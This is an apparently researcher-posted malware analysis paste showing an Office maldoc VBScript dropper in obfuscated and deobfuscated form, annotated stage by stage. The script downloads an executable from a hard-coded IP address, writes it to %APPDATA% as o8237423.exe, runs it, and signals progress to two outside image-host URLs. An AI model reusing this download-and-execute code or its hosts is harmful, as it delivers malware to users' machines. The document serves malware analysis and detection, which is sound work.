
Deobfuscated VBscript

bartblaze May 8th, 2015 (edited) 318 Never
  1. Obfuscated and deobfuscated VBScript used in the latest Office maldoc campaign.
  2. Related blog post: http://bartblaze.blogspot.com/2015/05/new-malicious-office-docs-trick.html
  3.  
  4.  
  5. <== obfuscated: ===>
  ' Stage 1 (analyst notes): download and launch. Every Chr() chain below is a string
  ' literal spelled out character by character; the decoded text is given per line.
  ' Chr(77)..Chr(80) = "Microsoft.XMLHTTP"
  6. dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
  ' Chr(65)..Chr(109) = "Adodb.Stream"
  7. dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
  ' Synchronous GET (third argument False) to the hard-coded download URL; the only
  ' literal the author left unobfuscated. The response body is written to disk below.
  8. HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
  9. HGyu87f7Usf.Send
  ' "WScript.Shell" ... .Environment("Process"): handle to the process environment block
  10. Set dfgfderer = WScript.CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) ).Environment(Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )
  ' Reads the "APPDATA" variable (user-writable, no elevation needed)
  11. iyUGbuwerff = dfgfderer(Chr(65) & Chr(80) & Chr(80) & Chr(68) & Chr(65) & Chr(84) & Chr(65) )
  ' Chr(92) = "\" followed by "o8237423.exe": drop path is %APPDATA%\o8237423.exe.
  ' The same filename is what the WMI loop further down waits for.
  12. iyUGUIvbuiwe7vhJ = iyUGbuwerff + Chr(92) & Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101)  
  ' Persist the HTTP response as a file: .type = 1 is ADODB adTypeBinary,
  ' .savetofile ..., 2 is adSaveCreateOverWrite (an existing file is replaced).
  13. with oUIOGuiwefff
  14.    .type = 1  
  15.     .open
  16.     .write HGyu87f7Usf.responseBody
  17.     .savetofile iyUGUIvbuiwe7vhJ, 2  
  18. end with
  ' "Shell.Application"; .Open on the dropped path executes it.
  ' Hunting note: a script host (wscript/cscript) writing an .exe under %APPDATA% and
  ' then spawning it is the observable sequence of this stage.
  19. Set uyGUYhi8wef = CreateObject(Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110) )
  20. uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ
  21.  
  ' Stage 2: a second "Microsoft.XMLHTTP" / "Adodb.Stream" pair. The stream object
  ' (jhvHVKfdg) is never referenced again, and the response is not read, so this
  ' request appears to be a check-in that only signals a successful download.
  22. dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
  23. dim jhvHVKfdg: Set jhvHVKfdg = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
  ' "GET", "http://savepic.org/7260406.jpg", synchronous
  24. JHyygUBjdfg.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(115) & Chr(97) & Chr(118) & Chr(101) & Chr(112) & Chr(105) & Chr(99) & Chr(46) & Chr(111) & Chr(114) & Chr(103) & Chr(47) & Chr(55) & Chr(50) & Chr(54) & Chr(48) & Chr(52) & Chr(48) & Chr(54) & Chr(46) & Chr(106) & Chr(112) & Chr(103) , False
  25. JHyygUBjdfg.Send
  26.  
  ' Stage 3: wait until the dropped executable is running.
  ' "winmgmts:\\.\root\cimv2" - local WMI namespace
  27. Set fdhtrewfwef = GetObject(Chr(119) & Chr(105) & Chr(110) & Chr(109) & Chr(103) & Chr(109) & Chr(116) & Chr(115) & Chr(58) & Chr(92) & Chr(92) & Chr(46) & Chr(92) & Chr(114) & Chr(111) & Chr(111) & Chr(116) & Chr(92) & Chr(99) & Chr(105) & Chr(109) & Chr(118) & Chr(50) )
  ' Poll loop: re-enumerates every process, sleeps 3000 ms between rounds, and
  ' only exits once a process named o8237423.exe is seen (Loop While Not Running).
  ' There is no retry limit, so if the payload never starts the script spins forever.
  28. Do
  29. Running = False
  ' "Select * from Win32_Process"
  30. Set colItems = fdhtrewfwef.ExecQuery(Chr(83) & Chr(101) & Chr(108) & Chr(101) & Chr(99) & Chr(116) & Chr(32) & Chr(42) & Chr(32) & Chr(102) & Chr(114) & Chr(111) & Chr(109) & Chr(32) & Chr(87) & Chr(105) & Chr(110) & Chr(51) & Chr(50) & Chr(95) & Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )
  31. For Each objItem In colItems
  ' "o8237423.exe" - same name as the file written in stage 1
  32. If objItem.Name = Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101)  Then
  33. Running = True
  34. Exit For
  35. End If
  36. Next
  37. If Not Running Then
  38. WScript.Sleep 3000
  39. End If
  40. Loop While Not Running
  ' Stage 4: third "Microsoft.XMLHTTP" / "Adodb.Stream" pair, same pattern as stage 2:
  ' the stream (dsfsdfsdfg) is unused and the response is discarded. Because it only
  ' runs after the WMI loop exits, this request appears to report that the payload started.
  41. dim sdfsdfsdf: Set sdfsdfsdf = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
  42. dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
  ' "GET", "http://savepic.net/6856149.jpg", synchronous
  43. sdfsdfsdf.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(115) & Chr(97) & Chr(118) & Chr(101) & Chr(112) & Chr(105) & Chr(99) & Chr(46) & Chr(110) & Chr(101) & Chr(116) & Chr(47) & Chr(54) & Chr(56) & Chr(53) & Chr(54) & Chr(49) & Chr(52) & Chr(57) & Chr(46) & Chr(106) & Chr(112) & Chr(103) , False
  44. sdfsdfsdf.Send
  45.  
  46.  
  47. =========================================================================================================
  48.  
  49.  
  50.  
  51. <== deobfuscated: ===>
  ' Deobfuscated stage 1 (download and launch). Reading note: this rendering replaced
  ' each Chr() chain with its characters but did not restore the surrounding quotes,
  ' so e.g. createobject(Microsoft.XMLHTTP ) is not valid VBScript as printed; compare
  ' the GET line below, whose literals were never obfuscated and still carry quotes.
  52. dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Microsoft.XMLHTTP )
  53. dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Adodb.Stream )
  ' Synchronous GET to the download URL (unchanged from the obfuscated version)
  54. HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
  55. HGyu87f7Usf.Send
  ' Resolve %APPDATA% from the process environment
  56. Set dfgfderer = WScript.CreateObject(WScript.Shell ).Environment(Process )
  57. iyUGbuwerff = dfgfderer(APPDATA )
  ' Drop path: %APPDATA%\o8237423.exe
  58. iyUGUIvbuiwe7vhJ = iyUGbuwerff + \o8237423.exe
  ' Write the response body to disk (.type = 1 binary; savetofile mode 2 overwrites)
  59. with oUIOGuiwefff
  60.    .type = 1
  61.     .open
  62.     .write HGyu87f7Usf.responseBody
  63.     .savetofile iyUGUIvbuiwe7vhJ, 2
  64. end with
  ' Execute the dropped file
  65. Set uyGUYhi8wef = CreateObject(Shell.Application )
  66. uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ
  67.  
  ' Deobfuscated stage 2: check-in GET; the stream object is never used and the
  ' response is not read in the visible code.
  68. dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Microsoft.XMLHTTP )
  69. dim jhvHVKfdg: Set jhvHVKfdg = createobject(Adodb.Stream )
  70. JHyygUBjdfg.Open GET , http://savepic.org/7260406.jpg , False
  71. JHyygUBjdfg.Send
  72.  
  ' Deobfuscated stage 3: poll Win32_Process via WMI every 3000 ms until a process
  ' named o8237423.exe (the file dropped in stage 1) is listed; no retry limit.
  73. Set fdhtrewfwef = GetObject(winmgmts:\\.\root\cimv2 )
  74. Do
  ' "Falsepasteb" is a paste artifact; the obfuscated original reads "Running = False".
  75. Running = Falsepasteb
  76. Set colItems = fdhtrewfwef.ExecQuery(Select * from Win32_Process )
  77. For Each objItem In colItems
  78. If objItem.Name = o8237423.exe  Then
  79. Running = True
  80. Exit For
  81. End If
  82. Next
  83. If Not Running Then
  84. WScript.Sleep 3000
  85. End If
  86. Loop While Not Running
  ' Deobfuscated stage 4: second check-in GET, issued only after the WMI loop has
  ' seen the payload process; stream object unused, response discarded.
  87. dim sdfsdfsdf: Set sdfsdfsdf = createobject(Microsoft.XMLHTTP )
  88. dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Adodb.Stream )
  89. sdfsdfsdf.Open GET , http://savepic.net/6856149.jpg , False
  90. sdfsdfsdf.Send
 